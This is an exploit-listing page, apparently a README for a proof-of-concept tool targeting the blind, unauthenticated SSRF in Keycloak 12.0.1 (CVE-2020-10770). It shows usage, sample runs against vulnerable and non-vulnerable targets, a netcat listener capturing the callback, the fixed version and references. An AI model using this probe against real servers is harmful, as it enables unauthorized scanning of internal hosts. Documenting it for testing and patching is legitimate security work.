Share
## https://sploitus.com/exploit?id=E219E794-E93F-5445-A9AD-E64037A1D912
# Keycloak-12.0.1-CVE-2020-10770

> Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated) 

[Exploit-DB-50405](https://www.exploit-db.com/exploits/50405)

Expected outcome: Port scan of localhost or internally accessible hosts.

Intended only for educational and testing in corporate environments.

This Exploit was tested on Python 3.8.6

### Usage:

```shell
cfx:  ~/keycloak
โ†’ python3 exploit.py -h
usage: exploit.py [-h] [-u URL]

-=[Keycloak Blind SSRF test by ColdFusionX]=-

optional arguments:
  -h, --help         show this help message and exit
  -u URL, --url URL  Keycloak Target URL (Example: http://127.0.0.1:8080)

Exploit Usage :
./exploit.py -u http://127.0.0.1:8080
[^] Input Netcat host:port -> 192.168.0.1:4444
```

### POC: 

- Scenario 1: Non Vulnerable Target

```shell
cfx:  ~/keycloak
โ†’ python3 exploit.py -u http://localhost:8080

[+] Keycloak Bind SSRF test by ColdFusionX

[^] Input Netcat host:port -> 192.168.0.1:4444

[-] Invalid URL or Target not Vulnerable
```

- Scenario 2: Vulnerable Target

```shell
cfx:  ~/keycloak
โ†’ python3 exploit.py -u http://localhost:8080

[+] Keycloak Bind SSRF test by ColdFusionX

[^] Input Netcat host:port -> 192.168.0.1:9994

[+] BINGO! Check Netcat listener for HTTP callback :)

```

HTTP Callback on nc listener:

```
cfx:  ~/keycloak
โ†’ nc -lvnp 9994
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9994
Ncat: Listening on 0.0.0.0:9994
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:36866.
GET / HTTP/1.1
Host: 192.168.0.1:9994
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.9.1)
Accept-Encoding: gzip,deflate
```

### Solution

Upgrade to Keycloak 12.0.2 or later version

### Reference

- https://bugzilla.redhat.com/show_bug.cgi?id=1846270
- https://nvd.nist.gov/vuln/detail/CVE-2020-10770